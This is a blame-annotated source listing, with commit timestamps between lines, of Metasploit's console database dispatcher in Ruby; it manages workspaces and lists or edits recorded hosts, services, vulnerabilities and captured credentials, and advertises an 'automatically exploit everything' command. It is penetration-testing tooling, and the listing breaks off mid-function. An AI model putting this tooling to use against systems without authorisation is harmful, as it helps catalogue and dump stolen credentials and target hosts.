2009-11-05 20:26:28 +00:00
|
|
|
|
2011-05-12 20:03:55 +00:00
|
|
|
require 'rexml/document'
|
|
|
|
require 'rex/parser/nmap_xml'
|
2010-10-17 04:50:15 +00:00
|
|
|
require 'msf/core/db_export'
|
2009-11-05 20:26:28 +00:00
|
|
|
|
2006-05-30 15:44:48 +00:00
|
|
|
module Msf
|
|
|
|
module Ui
|
|
|
|
module Console
|
|
|
|
module CommandDispatcher
|
2009-03-28 21:42:30 +00:00
|
|
|
class Db
|
2006-05-30 15:44:48 +00:00
|
|
|
|
2006-09-17 22:07:52 +00:00
|
|
|
require 'tempfile'
|
2009-03-28 21:42:30 +00:00
|
|
|
|
|
|
|
include Msf::Ui::Console::CommandDispatcher
|
2009-11-06 16:01:24 +00:00
|
|
|
|
2006-09-17 22:07:52 +00:00
|
|
|
#
|
|
|
|
# Constants
|
|
|
|
#
|
|
|
|
|
2006-12-10 08:21:52 +00:00
|
|
|
PWN_SHOW = 2**0
|
|
|
|
PWN_XREF = 2**1
|
|
|
|
PWN_PORT = 2**2
|
|
|
|
PWN_EXPL = 2**3
|
|
|
|
PWN_SING = 2**4
|
2008-11-18 22:01:15 +00:00
|
|
|
PWN_SLNT = 2**5
|
2009-12-03 01:36:17 +00:00
|
|
|
PWN_VERB = 2**6
|
2009-11-06 16:01:24 +00:00
|
|
|
|
2006-05-30 15:44:48 +00:00
|
|
|
#
|
|
|
|
# The dispatcher's name.
|
|
|
|
#
|
|
|
|
def name
|
|
|
|
"Database Backend"
|
|
|
|
end
|
|
|
|
|
|
|
|
#
|
|
|
|
# Returns the hash of commands supported by this dispatcher.
|
|
|
|
#
|
|
|
|
def commands
|
2009-03-28 21:42:30 +00:00
|
|
|
base = {
|
|
|
|
"db_driver" => "Specify a database driver",
|
|
|
|
"db_connect" => "Connect to an existing database",
|
|
|
|
"db_disconnect" => "Disconnect from the current database instance",
|
2010-05-10 09:23:53 +00:00
|
|
|
"db_status" => "Show the current database status",
|
|
|
|
# Deprecated
|
2009-03-28 21:42:30 +00:00
|
|
|
"db_create" => "Create a brand new database",
|
2011-05-25 00:30:03 +00:00
|
|
|
"db_destroy" => "Drop an existing database"
|
2009-03-28 21:42:30 +00:00
|
|
|
}
|
|
|
|
|
|
|
|
more = {
|
2009-12-14 22:52:34 +00:00
|
|
|
"db_workspace" => "Switch between database workspaces",
|
2009-03-28 21:42:30 +00:00
|
|
|
"db_hosts" => "List all hosts in the database",
|
|
|
|
"db_services" => "List all services in the database",
|
|
|
|
"db_vulns" => "List all vulnerabilities in the database",
|
|
|
|
"db_notes" => "List all notes in the database",
|
2011-02-27 16:30:17 +00:00
|
|
|
"db_loot" => "List all loot in the database",
|
2010-08-18 00:58:20 +00:00
|
|
|
"db_creds" => "List all credentials in the database",
|
2010-08-24 21:57:04 +00:00
|
|
|
"db_exploited" => "List all exploited hosts in the database",
|
2010-08-18 00:58:20 +00:00
|
|
|
"db_add_port" => "Add a port to a host",
|
|
|
|
"db_add_cred" => "Add a credential to a host:port",
|
2009-03-28 21:42:30 +00:00
|
|
|
"db_del_host" => "Delete one or more hosts from the database",
|
2009-04-26 14:53:37 +00:00
|
|
|
"db_del_port" => "Delete one port from the database",
|
2009-03-28 21:42:30 +00:00
|
|
|
"db_autopwn" => "Automatically exploit everything",
|
2010-01-07 19:06:29 +00:00
|
|
|
"db_import" => "Import a scan result file (filetype will be auto-detected)",
|
2011-07-19 17:41:20 +00:00
|
|
|
"db_export" => "Export a file containing the contents of the database",
|
|
|
|
"db_nmap" => "Executes nmap and records the output automatically",
|
2006-05-30 15:44:48 +00:00
|
|
|
}
|
2009-11-06 16:01:24 +00:00
|
|
|
|
2011-04-16 22:49:31 +00:00
|
|
|
# Always include commands that only make sense when connected.
|
|
|
|
# This avoids the problem of them disappearing unexpectedly if the
|
|
|
|
# database dies or times out. See #1923
|
2010-05-25 01:32:30 +00:00
|
|
|
base.merge(more)
|
|
|
|
end
|
|
|
|
|
2011-04-16 22:49:31 +00:00
|
|
|
#
|
|
|
|
# Returns true if the db is connected, prints an error and returns
|
|
|
|
# false if not.
|
|
|
|
#
|
|
|
|
# All commands that require an active database should call this before
|
|
|
|
# doing anything.
|
|
|
|
#
|
2010-05-25 01:32:30 +00:00
|
|
|
def active?
|
|
|
|
if not framework.db.active
|
|
|
|
print_error("Database not connected")
|
|
|
|
return false
|
|
|
|
end
|
|
|
|
true
|
2006-05-30 15:44:48 +00:00
|
|
|
end
|
|
|
|
|
2011-04-16 22:49:31 +00:00
|
|
|
def cmd_db_workspace_help
|
|
|
|
print_line "Usage:"
|
|
|
|
print_line " db_workspace List workspaces"
|
|
|
|
print_line " db_workspace [name] Switch workspace"
|
|
|
|
print_line " db_workspace -a [name] ... Add workspace(s)"
|
|
|
|
print_line " db_workspace -d [name] ... Delete workspace(s)"
|
|
|
|
print_line " db_workspace -h Show this help information"
|
|
|
|
print_line
|
|
|
|
end
|
|
|
|
|
2009-12-14 22:52:34 +00:00
|
|
|
def cmd_db_workspace(*args)
|
2010-05-25 01:32:30 +00:00
|
|
|
return unless active?
|
2009-12-14 22:52:34 +00:00
|
|
|
while (arg = args.shift)
|
|
|
|
case arg
|
|
|
|
when '-h','--help'
|
2011-04-16 22:49:31 +00:00
|
|
|
cmd_db_workspace_help
|
2009-12-14 22:52:34 +00:00
|
|
|
return
|
|
|
|
when '-a','--add'
|
|
|
|
adding = true
|
|
|
|
when '-d','--del'
|
|
|
|
deleting = true
|
|
|
|
else
|
2010-10-15 18:06:21 +00:00
|
|
|
names ||= []
|
|
|
|
names << arg
|
2009-12-14 22:52:34 +00:00
|
|
|
end
|
|
|
|
end
|
|
|
|
|
2010-10-15 18:06:21 +00:00
|
|
|
if adding and names
|
|
|
|
# Add workspaces
|
|
|
|
workspace = nil
|
|
|
|
names.each do |name|
|
2010-01-15 15:58:13 +00:00
|
|
|
workspace = framework.db.add_workspace(name)
|
2010-10-15 18:06:21 +00:00
|
|
|
print_status("Added workspace: #{workspace.name}")
|
|
|
|
end
|
|
|
|
framework.db.workspace = workspace
|
|
|
|
elsif deleting and names
|
|
|
|
# Delete workspaces
|
|
|
|
names.each do |name|
|
|
|
|
workspace = framework.db.find_workspace(name)
|
|
|
|
if workspace.nil?
|
|
|
|
print_error("Workspace not found: #{name}")
|
|
|
|
elsif workspace.default?
|
|
|
|
workspace.destroy
|
|
|
|
workspace = framework.db.add_workspace(name)
|
|
|
|
print_status("Deleted and recreated the default workspace")
|
|
|
|
else
|
|
|
|
# switch to the default workspace if we're about to delete the current one
|
|
|
|
framework.db.workspace = framework.db.default_workspace if framework.db.workspace.name == workspace.name
|
|
|
|
# now destroy the named workspace
|
|
|
|
workspace.destroy
|
|
|
|
print_status("Deleted workspace: #{name}")
|
|
|
|
end
|
2009-12-14 22:52:34 +00:00
|
|
|
end
|
2010-10-15 18:06:21 +00:00
|
|
|
elsif names
|
|
|
|
name = names.last
|
2009-12-14 22:52:34 +00:00
|
|
|
# Switch workspace
|
|
|
|
workspace = framework.db.find_workspace(name)
|
|
|
|
if workspace
|
|
|
|
framework.db.workspace = workspace
|
|
|
|
print_status("Workspace: #{workspace.name}")
|
|
|
|
else
|
|
|
|
print_error("Workspace not found: #{name}")
|
|
|
|
return
|
|
|
|
end
|
|
|
|
else
|
|
|
|
# List workspaces
|
|
|
|
framework.db.workspaces.each do |s|
|
2009-12-23 20:37:30 +00:00
|
|
|
pad = (s.name == framework.db.workspace.name) ? "* " : " "
|
2009-12-14 22:52:34 +00:00
|
|
|
print_line(pad + s.name)
|
|
|
|
end
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
def cmd_db_workspace_tabs(str, words)
|
2010-10-15 18:06:21 +00:00
|
|
|
return [] unless active?
|
2009-12-14 22:52:34 +00:00
|
|
|
framework.db.workspaces.map { |s| s.name } if (words & ['-a','--add']).empty?
|
|
|
|
end
|
|
|
|
|
2011-04-16 22:49:31 +00:00
|
|
|
def cmd_db_hosts_help
|
|
|
|
# This command does some lookups for the list of appropriate column
|
|
|
|
# names, so instead of putting all the usage stuff here like other
|
|
|
|
# help methods, just use it's "-h" so we don't have to recreating
|
|
|
|
# that list
|
|
|
|
cmd_db_hosts("-h")
|
|
|
|
end
|
|
|
|
|
2010-05-17 04:01:26 +00:00
|
|
|
def cmd_db_hosts(*args)
|
2010-05-25 01:32:30 +00:00
|
|
|
return unless active?
|
2009-11-06 21:08:34 +00:00
|
|
|
onlyup = false
|
2009-12-18 01:14:05 +00:00
|
|
|
host_search = nil
|
2011-04-22 05:08:08 +00:00
|
|
|
set_rhosts = false
|
2011-06-14 22:17:07 +00:00
|
|
|
hostlist = []
|
2011-07-19 06:09:10 +00:00
|
|
|
mode = :search
|
2011-02-26 17:42:03 +00:00
|
|
|
|
2010-05-30 13:49:28 +00:00
|
|
|
output = nil
|
2009-12-22 22:20:58 +00:00
|
|
|
default_columns = ::Msf::DBManager::Host.column_names.sort
|
2010-07-06 18:18:26 +00:00
|
|
|
virtual_columns = [ 'svcs', 'vulns', 'workspace' ]
|
2011-02-26 17:42:03 +00:00
|
|
|
|
|
|
|
col_search = [ 'address', 'mac', 'name', 'os_name', 'os_flavor', 'os_sp', 'purpose', 'info', 'comments' ]
|
|
|
|
|
2009-12-22 22:20:58 +00:00
|
|
|
default_columns.delete_if {|v| (v[-2,2] == "id")}
|
2009-11-06 21:08:34 +00:00
|
|
|
while (arg = args.shift)
|
|
|
|
case arg
|
2011-07-19 06:09:10 +00:00
|
|
|
when '-a','--add'
|
|
|
|
mode = :add
|
2011-07-19 08:13:55 +00:00
|
|
|
when '-d','--delete'
|
|
|
|
mode = :delete
|
2009-12-22 22:20:58 +00:00
|
|
|
when '-c'
|
|
|
|
list = args.shift
|
|
|
|
if(!list)
|
|
|
|
print_error("Invalid column list")
|
|
|
|
return
|
|
|
|
end
|
|
|
|
col_search = list.strip().split(",")
|
|
|
|
col_search.each { |c|
|
2011-03-02 17:12:10 +00:00
|
|
|
if not default_columns.include?(c) and not virtual_columns.include?(c)
|
2010-07-06 18:18:26 +00:00
|
|
|
all_columns = default_columns + virtual_columns
|
|
|
|
print_error("Invalid column list. Possible values are (#{all_columns.join("|")})")
|
2009-12-22 22:20:58 +00:00
|
|
|
return
|
|
|
|
end
|
|
|
|
}
|
2009-11-06 21:08:34 +00:00
|
|
|
when '-u','--up'
|
|
|
|
onlyup = true
|
2010-05-30 13:49:28 +00:00
|
|
|
when '-o'
|
|
|
|
output = args.shift
|
2011-04-22 05:08:08 +00:00
|
|
|
when '-R','--rhosts'
|
|
|
|
set_rhosts = true
|
|
|
|
rhosts = []
|
|
|
|
|
2009-11-06 21:08:34 +00:00
|
|
|
when '-h','--help'
|
2011-06-14 22:17:07 +00:00
|
|
|
print_line "Usage: db_hosts [ options ] [addr1 addr2 ...]"
|
2009-12-22 22:20:58 +00:00
|
|
|
print_line
|
2011-06-14 22:17:07 +00:00
|
|
|
print_line "OPTIONS:"
|
2011-07-19 06:09:10 +00:00
|
|
|
print_line " -a,--add Add the hosts instead of searching"
|
2011-07-19 08:13:55 +00:00
|
|
|
print_line " -d,--delete Delete the hosts instead of searching"
|
2011-06-14 22:17:07 +00:00
|
|
|
print_line " -c <col1,col2> Only show the given columns (see list below)"
|
2009-12-22 22:20:58 +00:00
|
|
|
print_line " -h,--help Show this help information"
|
|
|
|
print_line " -u,--up Only show hosts which are up"
|
2010-07-22 16:53:11 +00:00
|
|
|
print_line " -o <file> Send output to a file in csv format"
|
2011-04-22 05:08:08 +00:00
|
|
|
print_line " -R,--rhosts Set RHOSTS from the results of the search"
|
2009-12-22 22:20:58 +00:00
|
|
|
print_line
|
|
|
|
print_line "Available columns: #{default_columns.join(", ")}"
|
|
|
|
print_line
|
2009-11-06 21:08:34 +00:00
|
|
|
return
|
2011-06-14 22:17:07 +00:00
|
|
|
else
|
|
|
|
hostlist.push(arg)
|
2009-11-06 21:08:34 +00:00
|
|
|
end
|
2006-05-30 15:44:48 +00:00
|
|
|
end
|
2009-11-06 21:08:34 +00:00
|
|
|
|
2011-06-14 22:17:07 +00:00
|
|
|
# This will be used in a database lookup. An empty array to search
|
|
|
|
# for will return in an empty result; give nil when we want them
|
|
|
|
# all.
|
|
|
|
host_search = (hostlist.empty? ? nil : hostlist)
|
|
|
|
|
2009-12-22 22:20:58 +00:00
|
|
|
if col_search
|
2011-02-26 17:42:03 +00:00
|
|
|
col_names = col_search
|
2011-07-19 06:09:10 +00:00
|
|
|
else
|
|
|
|
col_names = default_columns + virtual_columns
|
2009-12-22 22:20:58 +00:00
|
|
|
end
|
2010-07-22 16:53:11 +00:00
|
|
|
|
2011-07-19 06:09:10 +00:00
|
|
|
case mode
|
|
|
|
when :add
|
|
|
|
hostlist.each do |address|
|
|
|
|
host = framework.db.find_or_create_host(:host => address)
|
|
|
|
print_status("Time: #{host.created_at} Host: host=#{host.address}")
|
|
|
|
if set_rhosts
|
|
|
|
# only unique addresses
|
|
|
|
rhosts << host.address unless rhosts.include?(host.address)
|
|
|
|
end
|
|
|
|
end
|
2010-07-22 16:53:11 +00:00
|
|
|
|
2011-07-19 08:13:55 +00:00
|
|
|
when :delete
|
|
|
|
hostlist.each do |address|
|
|
|
|
if framework.db.del_host(framework.db.workspace, address)
|
|
|
|
print_status("Host #{address} deleted")
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
2011-07-19 06:09:10 +00:00
|
|
|
when :search
|
|
|
|
tbl = Rex::Ui::Text::Table.new(
|
|
|
|
{
|
|
|
|
'Header' => "Hosts",
|
|
|
|
'Columns' => col_names,
|
|
|
|
})
|
|
|
|
|
|
|
|
framework.db.hosts(framework.db.workspace, onlyup, host_search).each do |host|
|
|
|
|
columns = col_names.map do |n|
|
|
|
|
# Deal with the special cases
|
|
|
|
if virtual_columns.include?(n)
|
|
|
|
case n
|
|
|
|
when "svcs"; host.services.length
|
|
|
|
when "vulns"; host.vulns.length
|
|
|
|
when "workspace"; host.workspace.name
|
|
|
|
end
|
|
|
|
# Otherwise, it's just an attribute
|
|
|
|
else
|
|
|
|
host.attributes[n] || ""
|
2010-07-06 18:18:26 +00:00
|
|
|
end
|
|
|
|
end
|
2010-07-22 16:53:11 +00:00
|
|
|
|
2011-07-19 06:09:10 +00:00
|
|
|
tbl << columns
|
|
|
|
if set_rhosts
|
|
|
|
# only unique addresses
|
|
|
|
rhosts << host.address unless rhosts.include?(host.address)
|
|
|
|
end
|
|
|
|
end
|
|
|
|
if output
|
|
|
|
print_status("Wrote hosts to #{output}")
|
|
|
|
::File.open(output, "wb") { |ofd|
|
|
|
|
ofd.write(tbl.to_csv)
|
|
|
|
}
|
|
|
|
else
|
|
|
|
print_line
|
|
|
|
print_line tbl.to_s
|
2011-04-22 05:08:08 +00:00
|
|
|
end
|
2009-12-22 02:48:54 +00:00
|
|
|
end
|
2011-04-22 05:08:08 +00:00
|
|
|
|
|
|
|
# Finally, handle the case where the user wants the resulting list
|
|
|
|
# of hosts to go into RHOSTS.
|
|
|
|
set_rhosts_from_addrs(rhosts) if set_rhosts
|
2010-05-17 04:01:26 +00:00
|
|
|
end
|
2006-05-30 15:44:48 +00:00
|
|
|
|
2011-04-16 22:49:31 +00:00
|
|
|
def cmd_db_services_help
|
|
|
|
# Like db_hosts, use "-h" instead of recreating the column list
|
|
|
|
# here
|
|
|
|
cmd_db_services("-h")
|
|
|
|
end
|
|
|
|
|
2006-05-30 15:44:48 +00:00
|
|
|
def cmd_db_services(*args)
|
2010-05-25 01:32:30 +00:00
|
|
|
return unless active?
|
2011-07-19 11:16:36 +00:00
|
|
|
mode = :search
|
2009-11-06 21:08:34 +00:00
|
|
|
onlyup = false
|
2011-04-22 02:22:21 +00:00
|
|
|
output_file = nil
|
2011-04-22 05:08:08 +00:00
|
|
|
set_rhosts = nil
|
2009-12-18 01:14:05 +00:00
|
|
|
host_search = nil
|
|
|
|
port_search = nil
|
|
|
|
proto_search = nil
|
|
|
|
name_search = nil
|
2011-02-27 15:58:08 +00:00
|
|
|
col_search = ['port', 'proto', 'name', 'state', 'info']
|
2009-12-22 22:20:58 +00:00
|
|
|
default_columns = ::Msf::DBManager::Service.column_names.sort
|
|
|
|
default_columns.delete_if {|v| (v[-2,2] == "id")}
|
2011-07-19 11:16:36 +00:00
|
|
|
addrlist = []
|
2009-11-06 21:08:34 +00:00
|
|
|
while (arg = args.shift)
|
|
|
|
case arg
|
2011-07-19 11:16:36 +00:00
|
|
|
when '-a','--add'
|
|
|
|
mode = :add
|
|
|
|
when '-d','--delete'
|
|
|
|
mode = :delete
|
2009-11-06 21:08:34 +00:00
|
|
|
when '-u','--up'
|
|
|
|
onlyup = true
|
2009-12-22 22:20:58 +00:00
|
|
|
when '-c'
|
|
|
|
list = args.shift
|
|
|
|
if(!list)
|
|
|
|
print_error("Invalid column list")
|
|
|
|
return
|
|
|
|
end
|
|
|
|
col_search = list.strip().split(",")
|
|
|
|
col_search.each { |c|
|
|
|
|
if not default_columns.include? c
|
|
|
|
print_error("Invalid column list. Possible values are (#{default_columns.join("|")})")
|
|
|
|
return
|
|
|
|
end
|
|
|
|
}
|
2009-11-06 21:08:34 +00:00
|
|
|
when '-p'
|
|
|
|
portlist = args.shift
|
2009-12-21 16:46:11 +00:00
|
|
|
if (!portlist)
|
|
|
|
print_error("Invalid port list")
|
2009-11-06 21:08:34 +00:00
|
|
|
return
|
|
|
|
end
|
2009-12-21 16:46:11 +00:00
|
|
|
ports = portlist.strip().split(",")
|
2009-11-06 21:08:34 +00:00
|
|
|
when '-r'
|
2009-12-21 16:46:11 +00:00
|
|
|
proto = args.shift
|
|
|
|
if (!proto)
|
2009-11-06 21:08:34 +00:00
|
|
|
print_status("Invalid protocol")
|
|
|
|
return
|
|
|
|
end
|
2009-12-21 16:46:11 +00:00
|
|
|
proto = proto.strip
|
2009-11-06 21:08:34 +00:00
|
|
|
when '-n'
|
|
|
|
namelist = args.shift
|
2009-12-21 16:46:11 +00:00
|
|
|
if (!namelist)
|
|
|
|
print_error("Invalid name list")
|
2009-11-06 21:08:34 +00:00
|
|
|
return
|
|
|
|
end
|
2009-12-21 16:46:11 +00:00
|
|
|
names = namelist.strip().split(",")
|
2011-04-22 02:22:21 +00:00
|
|
|
when '-o'
|
|
|
|
output_file = args.shift
|
|
|
|
if (!output_file)
|
|
|
|
print_error("Invalid output filename")
|
|
|
|
return
|
|
|
|
end
|
|
|
|
output_file = File.expand_path(output_file)
|
2011-04-22 05:08:08 +00:00
|
|
|
when '-R','--rhosts'
|
|
|
|
set_rhosts = true
|
|
|
|
rhosts = []
|
2009-11-06 21:08:34 +00:00
|
|
|
|
|
|
|
when '-h','--help'
|
2009-12-22 22:20:58 +00:00
|
|
|
print_line
|
2011-07-19 11:16:36 +00:00
|
|
|
print_line "Usage: db_services [-h] [-u] [-a] [-r <proto>] [-p <port1,port2>] [-n <name1,name2>] [-o <filename>] [addr1 addr2 ...]"
|
2009-12-22 22:20:58 +00:00
|
|
|
print_line
|
2011-07-19 11:16:36 +00:00
|
|
|
#print_line " -a,--add Add the services instead of searching"
|
|
|
|
print_line " -d,--delete Delete the services instead of searching"
|
2009-12-22 22:20:58 +00:00
|
|
|
print_line " -c <col1,col2> Only show the given columns"
|
|
|
|
print_line " -h,--help Show this help information"
|
|
|
|
print_line " -n <name1,name2> Search for a list of service names"
|
|
|
|
print_line " -p <port1,port2> Search for a list of ports"
|
|
|
|
print_line " -r <protocol> Only show [tcp|udp] services"
|
|
|
|
print_line " -u,--up Only show services which are up"
|
2011-04-22 02:22:21 +00:00
|
|
|
print_line " -o <file> Send output to a file in csv format"
|
2011-04-22 05:08:08 +00:00
|
|
|
print_line " -R,--rhosts Set RHOSTS from the results of the search"
|
2009-12-22 22:20:58 +00:00
|
|
|
print_line
|
|
|
|
print_line "Available columns: #{default_columns.join(", ")}"
|
|
|
|
print_line
|
2009-11-06 21:08:34 +00:00
|
|
|
return
|
2011-07-19 11:16:36 +00:00
|
|
|
else
|
|
|
|
addrlist << arg
|
2009-11-06 21:08:34 +00:00
|
|
|
end
|
2006-05-30 15:44:48 +00:00
|
|
|
end
|
2009-12-21 16:46:11 +00:00
|
|
|
|
2011-07-19 11:16:36 +00:00
|
|
|
case mode
|
|
|
|
when :add
|
|
|
|
addrlist.each { |addr|
|
|
|
|
# XXX: Can only deal with one port and one service name at
|
|
|
|
# a time right now. Them's the breaks.
|
|
|
|
host = framework.db.find_or_create_host(:host => addr)
|
|
|
|
next if not host
|
|
|
|
info = {
|
|
|
|
:host => host,
|
|
|
|
:port => ports.first.to_i
|
|
|
|
}
|
|
|
|
info[:proto] = proto.downcase if proto
|
|
|
|
info[:name] = names.first.downcase if names and names.first
|
|
|
|
|
|
|
|
svc = framework.db.find_or_create_service(info)
|
|
|
|
print_status("Time: #{svc.created_at} Note: host=#{svc.host.address} port=#{svc.port} proto=#{svc.proto} name=#{svc.name}")
|
|
|
|
}
|
|
|
|
|
|
|
|
when :delete
|
|
|
|
addrlist.each { |addr|
|
|
|
|
host = framework.db.workspace.hosts.find_by_address(addr)
|
|
|
|
next if not host
|
|
|
|
svc = host.services.find_by_port(port)
|
|
|
|
next if not svc
|
|
|
|
print_status("Time: #{svc.created_at} Note: host=#{svc.host.address} port=#{svc.port} proto=#{svc.proto} name=#{svc.name}")
|
|
|
|
svc.destroy
|
|
|
|
}
|
|
|
|
|
|
|
|
when :search
|
|
|
|
col_names = default_columns
|
|
|
|
if col_search
|
|
|
|
col_names = col_search
|
|
|
|
end
|
|
|
|
tbl = Rex::Ui::Text::Table.new({
|
|
|
|
'Header' => "Services",
|
|
|
|
'Columns' => ['host'] + col_names,
|
|
|
|
})
|
|
|
|
# The user didn't give us any addresses to search for, so
|
|
|
|
# switch to nil so ActiveRecord will return all of them.
|
|
|
|
if addrlist.empty?
|
|
|
|
addrlist = nil
|
|
|
|
end
|
|
|
|
|
|
|
|
framework.db.services(framework.db.workspace, onlyup, proto, addrlist, ports, names).each do |service|
|
|
|
|
host = service.host
|
|
|
|
columns = [host.address] + col_names.map { |n| service[n].to_s || "" }
|
|
|
|
tbl << columns
|
|
|
|
if set_rhosts
|
|
|
|
# only unique addresses
|
|
|
|
rhosts << host.address unless rhosts.include?(host.address)
|
|
|
|
end
|
|
|
|
end
|
|
|
|
print_line
|
|
|
|
if (output_file == nil)
|
|
|
|
print_line tbl.to_s
|
|
|
|
else
|
|
|
|
# create the output file
|
|
|
|
File.open(output_file, "wb") { |f| f.write(tbl.to_csv) }
|
|
|
|
print_status("Wrote services to #{output_file}")
|
2011-04-22 05:08:08 +00:00
|
|
|
end
|
2011-04-22 02:22:21 +00:00
|
|
|
end
|
2011-04-22 05:08:08 +00:00
|
|
|
|
|
|
|
# Finally, handle the case where the user wants the resulting list
|
|
|
|
# of hosts to go into RHOSTS.
|
|
|
|
set_rhosts_from_addrs(rhosts) if set_rhosts
|
|
|
|
|
2009-12-18 01:14:05 +00:00
|
|
|
end
|
2009-11-06 21:08:34 +00:00
|
|
|
|
2011-04-22 05:08:08 +00:00
|
|
|
|
2011-04-16 22:49:31 +00:00
|
|
|
def cmd_db_vulns_help
|
|
|
|
print_line "Usage: db_vulns"
|
|
|
|
print_line
|
|
|
|
print_line "Print all vulnerabilities in the database"
|
|
|
|
print_line
|
|
|
|
end
|
|
|
|
|
2010-02-18 06:40:38 +00:00
|
|
|
|
2006-05-30 15:44:48 +00:00
|
|
|
def cmd_db_vulns(*args)
|
2010-05-25 01:32:30 +00:00
|
|
|
return unless active?
|
2010-02-18 06:40:38 +00:00
|
|
|
framework.db.each_vuln(framework.db.workspace) do |vuln|
|
2006-09-16 20:08:13 +00:00
|
|
|
reflist = vuln.refs.map { |r| r.name }
|
2009-11-25 01:44:55 +00:00
|
|
|
if(vuln.service)
|
2010-02-18 21:57:01 +00:00
|
|
|
print_status("Time: #{vuln.created_at} Vuln: host=#{vuln.host.address} port=#{vuln.service.port} proto=#{vuln.service.proto} name=#{vuln.name} refs=#{reflist.join(',')}")
|
2009-11-25 01:44:55 +00:00
|
|
|
else
|
2010-02-18 21:57:01 +00:00
|
|
|
print_status("Time: #{vuln.created_at} Vuln: host=#{vuln.host.address} name=#{vuln.name} refs=#{reflist.join(',')}")
|
2009-11-25 01:44:55 +00:00
|
|
|
end
|
2006-05-30 15:44:48 +00:00
|
|
|
end
|
2009-11-06 16:01:24 +00:00
|
|
|
end
|
2008-03-02 04:46:13 +00:00
|
|
|
|
2011-07-19 11:16:36 +00:00
|
|
|
def cmd_db_creds_help
|
|
|
|
print_line "Usage: db_creds [addr range|port range|list of services]"
|
|
|
|
print_line
|
|
|
|
#print_line " -a,--add Add a note to the list of addresses, instead of listing"
|
|
|
|
#print_line " -d,--delete Delete the hosts instead of searching"
|
|
|
|
print_line " -h,--help Show this help information"
|
|
|
|
print_line " -p Treat other argument as a port range"
|
|
|
|
print_line " -s Treat other arg as comma-separated service names"
|
|
|
|
print_line
|
|
|
|
print_line "Examples:"
|
|
|
|
print_line " db_creds # Default, returns all active credentials"
|
|
|
|
print_line " db_creds all # Returns all credentials active or not"
|
|
|
|
print_line " db_creds 1.2.3.4/24"
|
|
|
|
print_line " db_creds -p 1-1024"
|
|
|
|
print_line " db_creds -s ssh,smb,etc"
|
|
|
|
print_line
|
|
|
|
end
|
|
|
|
|
2011-06-29 14:50:15 +00:00
|
|
|
#
|
2011-07-19 06:09:10 +00:00
|
|
|
# Only takes two arguments. Can return return active or all, on a certain
|
|
|
|
# host or range, on a certain port or range, and/or on a service name.
|
2011-06-29 14:50:15 +00:00
|
|
|
#
|
2010-08-18 00:58:20 +00:00
|
|
|
# E.g., these:
|
2011-06-29 14:50:15 +00:00
|
|
|
# db_creds # Default, returns all active credentials)
|
2011-07-19 06:09:10 +00:00
|
|
|
# db_creds all # Returns all credentials, active or not
|
2011-06-29 14:50:15 +00:00
|
|
|
# db_creds host=10.10.10.0/24
|
|
|
|
# db_creds port=1-1024
|
|
|
|
# db_creds service=ssh,smb,http
|
2010-08-18 00:58:20 +00:00
|
|
|
#
|
|
|
|
def cmd_db_creds(*args)
|
|
|
|
return unless active?
|
2011-07-19 11:16:36 +00:00
|
|
|
|
|
|
|
search_term = "host"
|
2010-08-18 00:58:20 +00:00
|
|
|
search_param = nil
|
|
|
|
inactive_ok = false
|
2011-07-19 11:16:36 +00:00
|
|
|
|
|
|
|
# Short-circuit help
|
|
|
|
if args.delete "-h"
|
|
|
|
cmd_db_creds_help
|
|
|
|
return
|
|
|
|
end
|
|
|
|
|
|
|
|
if args.delete "-p"
|
|
|
|
search_term = "port"
|
|
|
|
elsif args.delete "-s"
|
|
|
|
search_term = "service"
|
|
|
|
end
|
|
|
|
|
|
|
|
# Does the user want inactive passwords, too?
|
|
|
|
if args.delete "all"
|
2010-08-18 00:58:20 +00:00
|
|
|
inactive_ok = true
|
|
|
|
end
|
2011-07-19 11:16:36 +00:00
|
|
|
|
|
|
|
# Anything that wasn't an option is the thing to search for
|
|
|
|
search_param = args.shift
|
|
|
|
|
|
|
|
# Set up the place we're searching before dropping into the search loop
|
|
|
|
case search_term
|
|
|
|
when "host"
|
|
|
|
begin
|
|
|
|
rw = Rex::Socket::RangeWalker.new(search_param)
|
|
|
|
rescue
|
|
|
|
print_error "Invalid host parameter."
|
|
|
|
return
|
|
|
|
end
|
|
|
|
when "port"
|
|
|
|
if search_param =~ /([0-9]+)-([0-9]+)/
|
|
|
|
ports = Range.new($1,$2)
|
|
|
|
else
|
|
|
|
ports = Range.new(search_param,search_param)
|
|
|
|
end
|
|
|
|
when "service"
|
|
|
|
svcs = search_param.split(/[\s]*,[\s]*/)
|
|
|
|
end
|
|
|
|
|
|
|
|
creds_returned = 0
|
2010-08-18 00:58:20 +00:00
|
|
|
framework.db.each_cred(framework.db.workspace) do |cred|
|
2011-07-19 11:16:36 +00:00
|
|
|
# skip if it's inactive and user didn't ask for all
|
|
|
|
next unless (cred.active or inactive_ok)
|
|
|
|
|
|
|
|
# Also skip if the user is searching for something and this
|
|
|
|
# one doesn't match
|
|
|
|
unless search_param.nil?
|
2010-08-18 00:58:20 +00:00
|
|
|
case search_term
|
2011-07-19 11:16:36 +00:00
|
|
|
when "host"; next unless rw.include? cred.service.host.address
|
|
|
|
when "port"; next unless ports.include? cred.service.port.to_s
|
|
|
|
when "service"; next unless svcs.include? cred.service.name
|
2010-08-18 00:58:20 +00:00
|
|
|
end
|
|
|
|
end
|
2011-07-19 11:16:36 +00:00
|
|
|
|
|
|
|
print_status("Time: #{cred.updated_at} Credential: host=#{cred.service.host.address} port=#{cred.service.port} proto=#{cred.service.proto} sname=#{cred.service.name} type=#{cred.ptype} user=#{cred.user} pass=#{cred.pass} active=#{cred.active}")
|
|
|
|
creds_returned += 1
|
2010-08-18 00:58:20 +00:00
|
|
|
end
|
|
|
|
print_status "Found #{creds_returned} credential#{creds_returned == 1 ? "" : "s"}."
|
|
|
|
end
|
|
|
|
|
2010-08-24 21:57:04 +00:00
|
|
|
# Returns exploited hosts. Takes a similiar set of options as db_creds
|
|
|
|
def cmd_db_exploited(*args)
|
|
|
|
return unless active?
|
2011-07-19 11:16:36 +00:00
|
|
|
search_term = "host"
|
|
|
|
search_param = nil
|
|
|
|
inactive_ok = false
|
|
|
|
|
|
|
|
# Short-circuit help
|
|
|
|
if args.delete "-h"
|
|
|
|
cmd_db_creds_help
|
2010-08-24 21:57:04 +00:00
|
|
|
return
|
|
|
|
end
|
2011-07-19 11:16:36 +00:00
|
|
|
|
|
|
|
if args.delete "-p"
|
|
|
|
search_term = "port"
|
|
|
|
elsif args.delete "-s"
|
|
|
|
search_term = "service"
|
|
|
|
end
|
|
|
|
|
|
|
|
# Does the user want inactive passwords, too?
|
|
|
